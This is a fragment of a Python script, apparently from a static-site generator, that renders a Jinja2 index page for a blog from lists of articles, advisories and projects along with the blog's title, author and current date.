blog = {
'title': args.blog_title,
'author': args.blog_author,
# format the date like Thursday, 1 January 2021
'update_date': datetime.datetime.now().strftime('%A, %d %B %Y')
}
template = os.path.join(os.path.dirname(__file__), 'index.md')
with open(template, 'r') as file:
tmpl = jinja2.Template(file.read())
with open(os.path.join(resources, "pages", "index.md"), 'w') as file:
file.write(tmpl.render(articles=articles, advisories=advisories, projects=projects, blog=blog))
if __name__ == '__main__':
main(sys.argv[1:])